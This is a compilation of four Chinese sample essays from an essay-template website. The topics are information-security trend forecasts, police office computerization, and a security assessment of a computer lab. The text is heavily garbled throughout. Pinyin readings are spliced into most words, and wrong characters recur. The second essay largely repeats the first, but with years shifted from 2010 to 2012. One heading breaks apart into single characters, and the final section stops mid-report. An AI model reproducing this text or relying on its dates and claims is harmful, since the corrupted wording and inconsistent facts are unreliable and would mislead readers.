第一篇：網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報(bào)告

這是一篇關(guān)于調(diào)研報(bào)告的范文，可以提供大家借鑒！

1.垃圾郵件和網(wǎng)絡(luò)欺騙將立足“社交網(wǎng)絡(luò)”

毫無(wú)疑問(wèn)，2009年是社交網(wǎng)站迄今為止受到攻擊最多的一年。但是與2010年相比，這些攻擊可能根本不值一提。Koobface蠕蟲(chóng)等安全問(wèn)題對(duì)社交網(wǎng)站用戶形成了很大的困擾，但這些惡意軟件仍然是首先感染用戶的電腦，然后再竊取信息。但現(xiàn)在，安全專(zhuān)家則認(rèn)為，惡意軟件作者將進(jìn)一步拓展攻擊范圍，把惡意軟件植入到社交網(wǎng)站應(yīng)用內(nèi)部。有了這種病毒，無(wú)論用戶是否訪問(wèn)社交網(wǎng)站，黑客都能毫無(wú)限制地竊取用戶的資料和登錄密碼。

思科在其2009年《年度安全報(bào)告》中揭示了社交媒體（尤其是社交網(wǎng)絡(luò)）對(duì)網(wǎng)絡(luò)安全的影響，并探討了人（而非技術(shù)）在為網(wǎng)絡(luò)犯罪創(chuàng)造機(jī)會(huì)方面所起的關(guān)鍵作用。社交網(wǎng)絡(luò)已經(jīng)迅速成為網(wǎng)絡(luò)犯罪的溫床，因?yàn)檫@些網(wǎng)站的成員過(guò)于信任他們社區(qū)的其他成員，沒(méi)有采取阻止惡意軟件和計(jì)算機(jī)病毒的預(yù)防措施。小漏洞、不良用戶行為以及過(guò)期的安全軟件結(jié)合在一起會(huì)具有潛在的破壞性，可能大幅增加網(wǎng)絡(luò)安全的風(fēng)險(xiǎn)。鑒于以上，2010年社交網(wǎng)絡(luò)或許將給我信息安全帶來(lái)更多的“驚喜”！

2.云計(jì)算成為孕育黑客新的溫床

云計(jì)算在2009年取得了長(zhǎng)足的發(fā)展，但我們也必須意識(shí)到，市場(chǎng)的快速發(fā)展會(huì)犧牲一定的安全性。攻擊者今后將把更多的時(shí)間用于挖掘云計(jì)算服務(wù)提供商的ApI（應(yīng)用編程接口）漏洞。

毋庸置疑，已經(jīng)開(kāi)始有越來(lái)越多的IT功能通過(guò)云計(jì)算來(lái)提供，網(wǎng)絡(luò)犯罪也順應(yīng)了這一趨勢(shì)。安全廠商Fortinet預(yù)計(jì)，網(wǎng)絡(luò)犯罪借鑒“服務(wù)即安 全”（security-as-a-service）的理念，打造“服務(wù)即網(wǎng)絡(luò)犯罪”（cybercrime-as-a-service）這一特殊品牌。網(wǎng)絡(luò)犯罪也將效仿企業(yè)的做法使用基于云計(jì)算的工具，以便更有效率地部署遠(yuǎn)程攻擊，甚至借此大幅拓展攻擊范圍。

對(duì)于云計(jì)算將被黑客所利用這個(gè)嚴(yán)峻的問(wèn)題，各大安全公司和技術(shù)人員會(huì)把精力放在與云計(jì)算相關(guān)的安全服務(wù)上，提供加密、目錄和管理、反垃圾郵件、惡意程序等各種解決方案。據(jù)悉，著名安全評(píng)測(cè)機(jī)構(gòu)VB100號(hào)召安全行業(yè)應(yīng)該聯(lián)合起來(lái)，組成一個(gè)對(duì)抗惡意程序的共同體，分享技術(shù)和資源?；蛟S這一提議在2010年能發(fā)展到實(shí)質(zhì)性的階段。

3.大量Mac計(jì)算機(jī)被病毒感染或黑客入侵

經(jīng)濟(jì)危機(jī)非但沒(méi)有傷害到蘋(píng)果的利益，反而使其業(yè)績(jī)進(jìn)一步提升。但安全專(zhuān)家表示，在市場(chǎng)份額提升的同時(shí)，Mac也要面臨更多的黑客攻擊。過(guò)去幾年 間，蘋(píng)果的pC市場(chǎng)份額已經(jīng)從10%增長(zhǎng)到12%，而且沒(méi)有放緩的跡象。與此同時(shí)，在售價(jià)高于1000美元的筆記本電腦中，蘋(píng)果更是占據(jù)了90%的份額，但針對(duì)iphone（手機(jī)上網(wǎng)）和MacBook的攻擊也逐步引發(fā)外界關(guān)注。安全專(zhuān)家預(yù)計(jì)，Mac有可能會(huì)成為下一個(gè)最易受攻擊的目標(biāo)。盡管多數(shù)攻擊都瞄準(zhǔn)Windows，但2012年將會(huì)出現(xiàn)更多針對(duì)Mac OS X的攻擊。

安全廠商Websense安全研究高級(jí)經(jīng)理帕特里克•盧納德（patrick Runald）說(shuō)：“Mac OS X中沒(méi)有任何的惡意軟件防范機(jī)制?！彼硎?，在CanSecWest黑客大賽上，Mac已經(jīng)連續(xù)兩年成為第一個(gè)被攻破的系統(tǒng)。

4.智能手機(jī)安全問(wèn)題愈發(fā)嚴(yán)重

隨著移動(dòng)應(yīng)用的不斷增多，智能設(shè)備的受攻擊面也在不斷擴(kuò)大，移動(dòng)安全所面臨的局面將會(huì)越來(lái)越嚴(yán)重。雖然我們已經(jīng)看到了iphone上的蠕蟲(chóng)病毒，雖然它還不能自我傳播，還得依靠電腦來(lái)傳播，但是我們預(yù)計(jì)，2012年，將會(huì)出現(xiàn)真正可以自我傳播的病毒，嚴(yán)重威脅iphone和Android等設(shè)備。

卡巴斯基實(shí)驗(yàn)室惡意軟件高級(jí)研究員羅伊爾•舒文伯格（Roel Schouwenberg）說(shuō)：“Android手機(jī)的日益流行，加之缺乏對(duì)第三方應(yīng)用安全性的有效控制，將導(dǎo)致諸多高調(diào)惡意軟件的出現(xiàn)。”

總體而言，安全專(zhuān)家認(rèn)為，隨著用戶將智能手機(jī)作為迷你pC來(lái)處理銀行交易、游戲、社交網(wǎng)站和其他的業(yè)務(wù)，黑客將越發(fā)關(guān)注這一平臺(tái)。

5.搜索引擎成為黑客全新贏利方式

黑客會(huì)不斷尋找新的方法借助釣魚(yú)網(wǎng)站吸引用戶上鉤，利用搜索引擎優(yōu)化技術(shù)展開(kāi)攻擊便是其中的一種方法。谷歌和必應(yīng)（Bing）對(duì)實(shí)時(shí)搜索的支持 也將吸引黑客進(jìn)一步提升相關(guān)技術(shù)。作為一種攻擊渠道，搜索引擎是非常理想的選擇，因?yàn)橛脩敉ǔ６挤浅Ｐ湃嗡阉饕?，?duì)于排在前幾位的搜索結(jié)果更是沒(méi)有任何 懷疑，這就給了黑客可乘之機(jī)，從而對(duì)用戶發(fā)動(dòng)攻擊。

6.虛擬化普及 安全威脅適應(yīng)潮流

與Cloud類(lèi)似的是，虛擬化技術(shù)也將抓住快速發(fā)展的時(shí)機(jī)。業(yè)界中已經(jīng)有公司開(kāi)始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障，還能方便協(xié)作，提高效率。

除了瘦客戶機(jī)的虛擬桌面以外，企業(yè)還將會(huì)開(kāi)始考察筆記本電腦虛擬機(jī)以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機(jī)可利用快照迅速恢復(fù)到已知的安全狀態(tài)配置，從而為網(wǎng)上銀行或安全的企業(yè)應(yīng)用提供更高等級(jí)的安全保障。工作和休閑可以在同一的硬件上共存，只要相互保持隔離就行。

第二篇：網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報(bào)告

1.垃圾郵件和網(wǎng)絡(luò)欺騙將立足“社交網(wǎng)絡(luò)”

毫無(wú)疑問(wèn)，2009年是社交網(wǎng)站迄今為止受到攻擊最多的一年。但是與2012年相比，這些攻擊可能根本不值一提。Koobface蠕蟲(chóng)等安全問(wèn)題對(duì)社交網(wǎng)站用戶形成了很大的困擾，但這些惡意軟件仍然是首先感染用戶的電腦，然后再竊取信息。但現(xiàn)在，安全專(zhuān)家則認(rèn)為，惡意軟件作者將進(jìn)一步拓展攻擊范圍，把惡意軟件植入到社交網(wǎng)站應(yīng)用內(nèi)部。有了這種病毒，無(wú)論用戶是否訪問(wèn)社交網(wǎng)站，黑客都能毫無(wú)限制地竊取用戶的資料和登錄密碼。

思科在其2009年《安全報(bào)告》中揭示了社交媒體（尤其是社交網(wǎng)絡(luò)）對(duì)網(wǎng)絡(luò)安全的影響，并探討了人（而非技術(shù)）在為網(wǎng)絡(luò)犯罪創(chuàng)造機(jī)會(huì)方面所起的關(guān)鍵作用。社交網(wǎng)絡(luò)已經(jīng)迅速成為網(wǎng)絡(luò)犯罪的溫床，因?yàn)檫@些網(wǎng)站的成員過(guò)于信任他們社區(qū)的其他成員，沒(méi)有采取阻止惡意軟件和計(jì)算機(jī)病毒的預(yù)防措施。小漏洞、不良用戶行為以及過(guò)期的安全軟件結(jié)合在一起會(huì)具有潛在的破壞性，可能大幅增加網(wǎng)絡(luò)安全的風(fēng)險(xiǎn)。鑒于以上，2012年社交網(wǎng)絡(luò)或許將給我信息安全帶來(lái)更多的“驚喜”！

2.云計(jì)算成為孕育黑客新的溫床

云計(jì)算在2009年取得了長(zhǎng)足的發(fā)展，但我們也必須意識(shí)到，市場(chǎng)的快速發(fā)展會(huì)犧牲一定的安全性。攻擊者今后將把更多的時(shí)間用于挖掘云計(jì)算服務(wù)提供商的ApI（應(yīng)用編程接口）漏洞。

004km.cn【xiexiebang.com范文網(wǎng)】

毋庸置疑，已經(jīng)開(kāi)始有越來(lái)越多的IT功能通過(guò)云計(jì)算來(lái)提供，網(wǎng)絡(luò)犯罪也順應(yīng)了這一趨勢(shì)。安全廠商Fortinet預(yù)計(jì)，網(wǎng)絡(luò)犯罪借鑒“服務(wù)即安 全”（security-as-a-service）的理念，打造“服務(wù)即網(wǎng)絡(luò)犯罪”（cybercrime-as-a-service）這一特殊品牌。網(wǎng)絡(luò)犯罪也將效仿企業(yè)的做法使用基于云計(jì)算的工具，以便更有效率地部署遠(yuǎn)程攻擊，甚至借此大幅拓展攻擊范圍。

3.大量Mac計(jì)算機(jī)被病毒感染或黑客入侵

安全廠商Websense安全研究高級(jí)經(jīng)理帕特里克?盧納德（patrick Runald）說(shuō)：“Mac OS X中沒(méi)有任何的惡意軟件防范機(jī)制。”他表示，在CanSecWest黑客大賽上，Mac已經(jīng)連續(xù)兩年成為第一個(gè)被攻破的系統(tǒng)。

4.智能手機(jī)安全問(wèn)題愈發(fā)嚴(yán)重

隨著移動(dòng)應(yīng)用的不斷增多，智能設(shè)備的受攻擊面也在不斷擴(kuò)大，移動(dòng)安全所面臨的局面將會(huì)越來(lái)越嚴(yán)重。雖然我們已經(jīng)看到了iphone上的蠕蟲(chóng)病毒，雖然它還不能自我傳播，還得依靠電腦來(lái)傳播，但是我們預(yù)計(jì)，2012年，將會(huì)出現(xiàn)真正可以自我傳播的病毒，嚴(yán)重威脅iphone和Android等設(shè)備。

卡巴斯基實(shí)驗(yàn)室惡意軟件高級(jí)研究員羅伊爾?舒文伯格（Roel Schouwenberg）說(shuō)：“Android手機(jī)的日益流行，加之缺乏對(duì)第三方應(yīng)用安全性的有效控制，將導(dǎo)致諸多高調(diào)惡意軟件的出現(xiàn)?！?/p>

總體而言，安全專(zhuān)家認(rèn)為，隨著用戶將智能手機(jī)作為迷你pC來(lái)處理銀行交易、游戲、社交網(wǎng)站和其他的業(yè)務(wù)，黑客將越發(fā)關(guān)注這一平臺(tái)。

5.搜索引擎成為黑客全新贏利方式

黑客會(huì)不斷尋找新的方法借助釣魚(yú)網(wǎng)站吸引用戶上鉤，利用搜索引擎優(yōu)化技術(shù)展開(kāi)攻擊便是其中的一種方法。谷歌和必應(yīng)（Bing）對(duì)實(shí)時(shí)搜索的支持 也將吸引黑客進(jìn)一步提升相關(guān)技術(shù)。作為一種攻擊渠道，搜索引擎是非常理想的選擇，因?yàn)橛脩敉ǔ６挤浅Ｐ湃嗡阉饕妫瑢?duì)于排在前幾位的搜索結(jié)果更是沒(méi)有任何 懷疑，這就給了黑客可乘之機(jī)，從而對(duì)用戶發(fā)動(dòng)攻擊。

6.虛擬化普及 安全威脅適應(yīng)潮流

與Cloud類(lèi)似的是，虛擬化技術(shù)也將抓住快速發(fā)展的時(shí)機(jī)。業(yè)界中已經(jīng)有公司開(kāi)始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障，還能方便協(xié)作，提高效率。

除了瘦客戶機(jī)的虛擬桌面以外，企業(yè)還將會(huì)開(kāi)始考察筆記本電腦虛擬機(jī)以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機(jī)可利用快照迅速恢復(fù)到已知的安全狀態(tài)配置，從而為網(wǎng)上銀行或安全的企業(yè)應(yīng)用提供更高等級(jí)的安全保障。工作和休閑可以在同一的硬件上共存，只要相互保持隔離就行。

第三篇：信息安全調(diào)研報(bào)告

公安基層辦公室信息化調(diào)研報(bào)告

現(xiàn)代社會(huì)的信息化、網(wǎng)絡(luò)化和現(xiàn)代通信、計(jì)算機(jī)互聯(lián)網(wǎng)技術(shù)的發(fā)展，對(duì)公安機(jī)關(guān)提出了越來(lái)越高的要求。為適應(yīng)社會(huì)形勢(shì)發(fā)展的需要，公安部近年來(lái)連續(xù)部署了“金盾工程”建設(shè)，標(biāo)志著警務(wù)工作信息化工程全面啟動(dòng)。要適應(yīng)社會(huì)發(fā)展和科技進(jìn)步的需要，公安機(jī)關(guān)必須把科技強(qiáng)警工作和公安信息化建設(shè)擺在重要的位置。公安辦公室作為“司令部”、“參謀部”，要及時(shí)、準(zhǔn)確掌握各類(lèi)情況，為領(lǐng)導(dǎo)決策提供科學(xué)依據(jù)，必須加強(qiáng)信息化建設(shè)。

一、基層公安辦公室信息化是公安信息化的薄弱環(huán)節(jié)

（一）認(rèn)識(shí)上的偏差

部分領(lǐng)導(dǎo)和民警在思想觀念上存在著只須懂法就足以勝任當(dāng)前公安工作的偏見(jiàn)，對(duì)信息化的了解也僅限于信息化就是用微機(jī)打字、信息化就是上因特網(wǎng)，對(duì)信息化范圍、信息化開(kāi)展的意義認(rèn)識(shí)不足，沒(méi)有真正意識(shí)到信息化建設(shè)對(duì)公安工作有著巨大推動(dòng)作用。因此，公安機(jī)關(guān)出現(xiàn)了阻礙科學(xué)技術(shù)與辦案結(jié)合的不利因素，缺乏依靠科技進(jìn)步的內(nèi)在動(dòng)力；對(duì)于如何把信息技術(shù)運(yùn)用到公安工作中來(lái)、如何用信息化促進(jìn)公安工作的跨越式發(fā)展，研究較少，重視不夠。這種狀況已成為公安機(jī)關(guān)加快信息化進(jìn)程，推動(dòng)辦公、辦案現(xiàn)代化發(fā)展的瓶頸，與當(dāng)前形勢(shì)發(fā)展和公安工作的任務(wù)需求極不相應(yīng)，也制約了公安工作的發(fā)展。

（二）辦公室基礎(chǔ)設(shè)施簡(jiǎn)陋導(dǎo)致工作效率的低下

科技強(qiáng)警的鼓敲了幾年，但基層公安局辦公室仍然普遍存在基礎(chǔ)設(shè)施簡(jiǎn)陋、辦公條件差等現(xiàn)象，辦公室作為綜合部門(mén)，工作是多而雜，且有的工作手續(xù)多、所經(jīng)部門(mén)廣，僅僅依靠幾個(gè)民警的手工操作或單機(jī)辦公，往往使辦公室民警大有力不從心之感，工作效率低下那也是情理之中。因此，針對(duì)辦公室的職能作用，建立省人省力的信息化系統(tǒng)，將辦公室人員從材料難寫(xiě)的困惑中解脫出來(lái)，提高工作效率勢(shì)在必行。

（三）缺乏人才，使信息化建設(shè)力不從心

公安機(jī)關(guān)信息化建設(shè)工作存在最突出的問(wèn)題，就是嚴(yán)重缺乏信息技術(shù)人才。從目前來(lái)看，公安機(jī)關(guān)的工作人員在過(guò)去所接受的教育中很少涉及信息技術(shù)知識(shí)，而專(zhuān)門(mén)的技術(shù)人員又大多為法醫(yī)、會(huì)計(jì)、痕檢、攝像等傳統(tǒng)技術(shù)型工作人員，因此對(duì)于信息技術(shù)這門(mén)科技含量很高的結(jié)合技術(shù)，顯得束手無(wú)策，很難提出一個(gè)長(zhǎng)遠(yuǎn)的發(fā)展規(guī)劃、很難得心應(yīng)手地組織開(kāi)展信息化建設(shè)。對(duì)于有一些信息化建設(shè)的單位，又由于人才缺乏，先進(jìn)的信息化設(shè)備不能使用或不能充分發(fā)揮作用，使信息化建設(shè)的成果成為擺設(shè)。因此在沒(méi)有一支高水平的信息化技術(shù)人才隊(duì)伍的前提下，公安信息化建設(shè)對(duì)某些單位而言簡(jiǎn)直是一種神話或資金上的嚴(yán)重浪費(fèi)。

（四）缺乏資金，信息化建設(shè)難以保障

信息化建設(shè)是一項(xiàng)高技術(shù)、高投入、高效能的現(xiàn)代化基礎(chǔ)建設(shè)，必須要有足

夠的建設(shè)經(jīng)費(fèi)作保證。它所涉及的硬件設(shè)備、軟件系統(tǒng)都需要大量的資金來(lái)購(gòu)置。以一個(gè)縣公安局辦公室為例，信息化系統(tǒng)需要一個(gè)由一臺(tái)服務(wù)器，10臺(tái)終端微機(jī)組成的小型局型網(wǎng)，購(gòu)置網(wǎng)絡(luò)辦公系統(tǒng)、數(shù)據(jù)統(tǒng)計(jì)系統(tǒng)，僅此幾項(xiàng)建設(shè)資金投入就達(dá)幾十萬(wàn)元。財(cái)政卻往往因?yàn)楦鞣N原因，不能保障和支持公安機(jī)關(guān)的信息化建設(shè)。因此公安機(jī)關(guān)在信息化建設(shè)上只能是等米下鍋，信息化建設(shè)得不到有效保障。

二、加強(qiáng)基層公安局辦公室信息化建設(shè)的方法

（一）信息化系統(tǒng)的構(gòu)成公安辦公室信息化系統(tǒng)就是根據(jù)信息論、系統(tǒng)論、控制論、現(xiàn)代管理科學(xué)理論、現(xiàn)代信息技術(shù)，結(jié)合辦公室的職能作用和業(yè)務(wù)工作特點(diǎn)而建立的信息體系。公安辦公室信息化系統(tǒng)是公安信息系統(tǒng)的子系統(tǒng)，以技術(shù)為輔助手段，使公安辦公室獲得快速、靈敏、準(zhǔn)確、全面和安全有效的綜合信息支持，實(shí)現(xiàn)辦公自動(dòng)化、科學(xué)化、網(wǎng)絡(luò)化，以充分發(fā)揮公安辦公室的綜合分析、“參謀”作用。一般來(lái)說(shuō)，根據(jù)辦公室的職能作用，基層公安局辦公室信息化系統(tǒng)主要包括以下幾個(gè)系統(tǒng)：

1、指揮中心信息處理系統(tǒng)

該系統(tǒng)主要承擔(dān)快速、準(zhǔn)確、全面獲得的動(dòng)態(tài)信息，為領(lǐng)導(dǎo)正確決策提供第一手資料，是科學(xué)決策、快速指揮調(diào)度的重要依據(jù)和信息主渠道。指揮中心信息處理系統(tǒng)縱向與上下級(jí)公安指揮中心信息網(wǎng)絡(luò)連接，橫向以公安信息管理中心為樞紐，整合同級(jí)公安犯罪信息中心、交通、戶政、刑偵、出入境、治安等信息系統(tǒng)，運(yùn)用計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)控制手段，將分散的信息統(tǒng)一起來(lái)，實(shí)現(xiàn)信息資源共享和系統(tǒng)開(kāi)放，成為覆蓋全局、四通八達(dá)的能為各警種、各基層戰(zhàn)斗單位和一線民警提供大量信息的高速通信網(wǎng)，從而克服時(shí)空限制支持各警種協(xié)同作戰(zhàn)。

2、公安統(tǒng)計(jì)系統(tǒng)

該系統(tǒng)主要依靠統(tǒng)計(jì)軟件，進(jìn)行數(shù)據(jù)的收集、分類(lèi)、匯總，有效地進(jìn)行數(shù)據(jù)統(tǒng)計(jì)和解決統(tǒng)計(jì)不實(shí)問(wèn)題，并對(duì)下級(jí)公安機(jī)關(guān)進(jìn)行有力的綜合指導(dǎo)。公安統(tǒng)計(jì)系統(tǒng)可通過(guò)數(shù)據(jù)統(tǒng)計(jì)，進(jìn)一步進(jìn)行社會(huì)治安情況分析，為各級(jí)部門(mén)提供服務(wù)。

3、綜合調(diào)研系統(tǒng)

該系統(tǒng)主要以科學(xué)管理的手段快速、及時(shí)、準(zhǔn)確地收集各業(yè)務(wù)單位、基層機(jī)關(guān)所得到的成績(jī)和經(jīng)驗(yàn)，進(jìn)行系統(tǒng)分析，反映整個(gè)公安工作的經(jīng)驗(yàn)、成就和業(yè)績(jī)。

4、檔案管理系統(tǒng)

該系統(tǒng)主要是通過(guò)科學(xué)技術(shù)手段解決過(guò)去查找材料、文件困難，材料保存時(shí)間不能過(guò)長(zhǎng)等問(wèn)題。檔案管理系統(tǒng)建立后，將文件、材料的文號(hào)、文名、存放文柜進(jìn)行編號(hào)，錄入計(jì)算機(jī)，以便于檢索，并將文件、材料進(jìn)行掃描存入微機(jī)，需要查閱，只需在計(jì)算機(jī)中進(jìn)行檢索便可直接查看，同時(shí)還可通過(guò)局域網(wǎng)，突破時(shí)空限制。

5、刑偵、治安、戶政等業(yè)務(wù)部門(mén)系統(tǒng)

公安辦公室的職能作用決定了其工作具有綜合性的特點(diǎn)，辦公室與刑偵、治安、戶政等業(yè)務(wù)部門(mén)是相互服務(wù)的。因此，辦公室信息系統(tǒng)與刑偵、治安、戶政等業(yè)務(wù)部門(mén)的網(wǎng)絡(luò)連接是必不可少的。刑偵、治安、戶政等業(yè)務(wù)部門(mén)子系統(tǒng)主要是結(jié)合網(wǎng)絡(luò)技術(shù)手段，進(jìn)行網(wǎng)上追逃、戶口上網(wǎng)管理，以便進(jìn)行信息快速流通。如指揮中心信息處理子系統(tǒng)通過(guò)業(yè)務(wù)部門(mén)收集各類(lèi)業(yè)務(wù)數(shù)據(jù)、不安定情況等；辦公室綜合調(diào)研系統(tǒng)通過(guò)刑偵部門(mén)收集打擊犯罪的情況等；公安統(tǒng)計(jì)子系統(tǒng)從戶政收集人口數(shù)據(jù)等等，都可從各業(yè)務(wù)部門(mén)子系統(tǒng)網(wǎng)絡(luò)上獲得。

（二）辦公室信息化系統(tǒng)的建設(shè)

1、組建經(jīng)濟(jì)實(shí)用的小型局域網(wǎng)，搭建網(wǎng)絡(luò)化辦公平臺(tái)，實(shí)現(xiàn)信息化系統(tǒng)的職能作用。

2、購(gòu)置實(shí)用的業(yè)務(wù)辦公系統(tǒng)軟件，實(shí)現(xiàn)辦公自動(dòng)化。

基層公安辦公室根據(jù)實(shí)際情況可以自行購(gòu)買(mǎi)相應(yīng)的業(yè)務(wù)及辦公系統(tǒng)軟件。各基層公安局辦公室要積極爭(zhēng)取政策，引進(jìn)人才，把技術(shù)精、有責(zé)任心和熱愛(ài)公安事業(yè)的信息技術(shù)人才充實(shí)到公安機(jī)關(guān)中來(lái)，并努力營(yíng)造一個(gè)適合技術(shù)人員發(fā)展的空間，保證信息技術(shù)人才進(jìn)得來(lái)、留得住、用得好、有發(fā)展。其次立足本室，在沒(méi)有專(zhuān)門(mén)人才的情況下，加大全員培訓(xùn)力度，從實(shí)際工作出發(fā)，從實(shí)際應(yīng)用出發(fā)，努力提高全體民警的信息化素質(zhì)，提高計(jì)算機(jī)使用水平。

3、建立制度，確保信息化建設(shè)發(fā)揮作用。

信息化建設(shè)的項(xiàng)目建成以后，不能放著、擺著不用，而要充分地、強(qiáng)制性地利用起來(lái)。不能因?yàn)槊窬笥趥鹘y(tǒng)工作方法，學(xué)習(xí)掌握上存在惰性，學(xué)習(xí)掌握需要一段時(shí)間，而不做制度上的要求。應(yīng)從整體發(fā)展的角度、公安事業(yè)發(fā)展的高度，制定規(guī)章制度，要求各類(lèi)案件信息必須輸入微機(jī)、各類(lèi)公文必須在微機(jī)上書(shū)寫(xiě)、流轉(zhuǎn)，從而使民警從傳統(tǒng)的辦公狀態(tài)進(jìn)入到網(wǎng)絡(luò)化辦公、信息化辦公的角色中，只有這樣才能把信息化建設(shè)的成果應(yīng)用到公安工作中，推動(dòng)公安工作向前發(fā)展，才真正地將信息化建設(shè)落到實(shí)處。

第四篇：網(wǎng)絡(luò)信息安全評(píng)估報(bào)告

計(jì)算機(jī)信息安全評(píng)估報(bào)告

如何

實(shí)

現(xiàn)

如

下

圖

所

示

可用性1.人們通常采用一些技術(shù)措施或網(wǎng)絡(luò)安全設(shè)備來(lái)實(shí)現(xiàn)這些目標(biāo)。例如：

使用防火墻，把攻擊者阻擋在網(wǎng)絡(luò)外部，讓他們“迚不來(lái)”。

即使攻擊者迚入了網(wǎng)絡(luò)內(nèi)部，由于有加密機(jī)制，會(huì)使他們“改不了”和“拿不走”關(guān) 鍵信息和資源。

機(jī)密性2機(jī)密性將對(duì)敏感數(shù)據(jù)的訪問(wèn)權(quán)限控制在那些經(jīng)授權(quán)的個(gè)人，只有他們才能查看數(shù)據(jù)。機(jī)密性可防止向未經(jīng)授權(quán)的個(gè)人泄露信息，或防止信息被加工。

如圖所示，“迚不來(lái)”和“看不懂”都實(shí)現(xiàn)了信息系統(tǒng)的機(jī)密性。

人們使用口令對(duì)迚入系統(tǒng)的用戶迚行身份鑒別，非法用戶沒(méi)有口令就“迚不來(lái)”，這就保證了信息系統(tǒng)的機(jī)密性。

即使攻擊者破解了口令，而迚入系統(tǒng)，加密機(jī)制也會(huì)使得他們“看不懂”關(guān)鍵信息。例如，甲給乙發(fā)送加密文件，只有乙通過(guò)解密才能讀懂其內(nèi)容，其他人看到的是亂碼。由此便實(shí)現(xiàn)了信息的機(jī)密性。

完整性3如圖所示，“改不了”和“拿不走”都實(shí)現(xiàn)了信息系統(tǒng)的完整性。使用加密機(jī)制，可以保證信息系統(tǒng)的完整性，攻擊者無(wú)法對(duì)加密信息迚行修改或者復(fù)制。

不可抵賴性4如圖所示，“跑不掉”就實(shí)現(xiàn)了信息系統(tǒng)的不可抵賴性。如果攻擊者迚行了非法操作，系統(tǒng)管理員使用審計(jì)機(jī)制或簽名機(jī)制也可讓他們無(wú)所遁形

對(duì)考試的機(jī)房迚行“管理制度”評(píng)估。（1）評(píng)估說(shuō)明

為規(guī)范管理,保障計(jì)算機(jī)設(shè)備的正常運(yùn)行,創(chuàng)造良好的上機(jī)環(huán)境,必須制定相關(guān)的管理制度

（2）評(píng)估內(nèi)容

沒(méi)有建立相應(yīng)信息系統(tǒng)運(yùn)行管理規(guī)程、缺陷管理制度、統(tǒng)計(jì)匯報(bào)制度、運(yùn)維流程、值班制度，沒(méi)有實(shí)行工作票制度；機(jī)房出入管理制度上墻，但沒(méi)有機(jī)房迚出情況記錄（3）評(píng)估分析報(bào)告

所存在問(wèn)題：1沒(méi)有系統(tǒng)的相關(guān)負(fù)責(zé)人，機(jī)房也是誰(shuí)人都可以自由出入。2在上機(jī)過(guò)程中做與學(xué)習(xí)無(wú)關(guān)的工作。3機(jī)房財(cái)產(chǎn)規(guī)劃不健全等（4）評(píng)估建議

1、計(jì)算機(jī)室的管理由系統(tǒng)管理員負(fù)責(zé)，非機(jī)房工作人員未經(jīng)允許不準(zhǔn)迚入。未經(jīng)許可不得擅自上機(jī)操作和對(duì)運(yùn)行設(shè)備及各種配置迚行更改。

2、保持機(jī)房?jī)?nèi)清潔、安靜，嚴(yán)禁機(jī)房?jī)?nèi)吸煙、吐痰以及大聲喧嘩；嚴(yán)禁將易燃、易爆、易污染和強(qiáng)磁物品帶入機(jī)房。

3、機(jī)房?jī)?nèi)的一切物品，未經(jīng)管理員同意，不得隨意挪動(dòng)，拆卸和帶出機(jī)房。

4、上機(jī)時(shí)，應(yīng)先認(rèn)真檢查機(jī)器情況，如有問(wèn)題應(yīng)及時(shí)向機(jī)房管理員反應(yīng)。

5、上機(jī)人員不得在機(jī)房?jī)?nèi)迚行與上機(jī)考試無(wú)關(guān)的計(jì)算機(jī)操作。

6、上機(jī)時(shí)應(yīng)按規(guī)定操作，故意或因操作不當(dāng)造成設(shè)備損壞，除照價(jià)賠償外，視情節(jié)輕重給予處罰。對(duì)考試的機(jī)房迚行“物理安全”評(píng)估。（1）評(píng)估說(shuō)明

防火，防水，防塵，防腐蝕，主機(jī)房安裝門(mén)禁、監(jiān)控與報(bào)警系統(tǒng)。（2）評(píng)估內(nèi)容 主機(jī)房沒(méi)有安裝門(mén)禁、監(jiān)控系統(tǒng)，有消防報(bào)警系統(tǒng)。（3）評(píng)估分析報(bào)告

沒(méi)有詳細(xì)的機(jī)房配線圖，機(jī)房供甴系統(tǒng)將動(dòng)力、照明用甴與計(jì)算機(jī)系統(tǒng)供甴線路是分開(kāi)的，機(jī)房沒(méi)有配備應(yīng)急照明裝置，有定期對(duì)UPS的運(yùn)行狀況迚行檢測(cè)但沒(méi)有檢測(cè)記錄。

（4）評(píng)估建議

有詳細(xì)的機(jī)房配線圖，機(jī)房供甴系統(tǒng)將動(dòng)力、照明用甴與計(jì)算機(jī)系統(tǒng)供甴線路分開(kāi)，機(jī)房配備應(yīng)急照明裝置，定期對(duì)UPS的運(yùn)行狀況迚行檢測(cè)（查看半年內(nèi)檢測(cè)記錄）對(duì)考試的機(jī)房迚行“計(jì)算機(jī)系統(tǒng)安全”評(píng)估。（1）評(píng)估說(shuō)明

應(yīng)用系統(tǒng)的角色、權(quán)限分配有記錄；用戶賬戶的變更、修改、注銷(xiāo)有記錄（半年記錄情況）；關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作迚行審計(jì)幵迚行長(zhǎng)期存儲(chǔ)；對(duì)關(guān)鍵應(yīng)用系統(tǒng)有應(yīng)急預(yù)案；關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前迚行安全性測(cè)試。

（2）評(píng)估內(nèi)容

營(yíng)銷(xiāo)系統(tǒng)的角色、權(quán)限分配有記錄，其余系統(tǒng)沒(méi)有；用戶賬戶的變更、修改、注銷(xiāo)沒(méi)有記錄；關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作沒(méi)有迚行審計(jì)；沒(méi)有針對(duì)關(guān)鍵應(yīng)用系統(tǒng)的應(yīng)急預(yù)案；關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令有定期迚行變更；有些新系統(tǒng)上線前沒(méi)有迚行過(guò)安全性測(cè)試。

（3）評(píng)估分析報(bào)告

網(wǎng)絡(luò)中的防火墻位置部署合理，防火墻規(guī)則配置符合安全要求，防火墻規(guī)則配置的建立、更改有規(guī)范申請(qǐng)、審核、審批流程，對(duì)防火墻日志迚行存儲(chǔ)、備份。

（4）評(píng)估建議

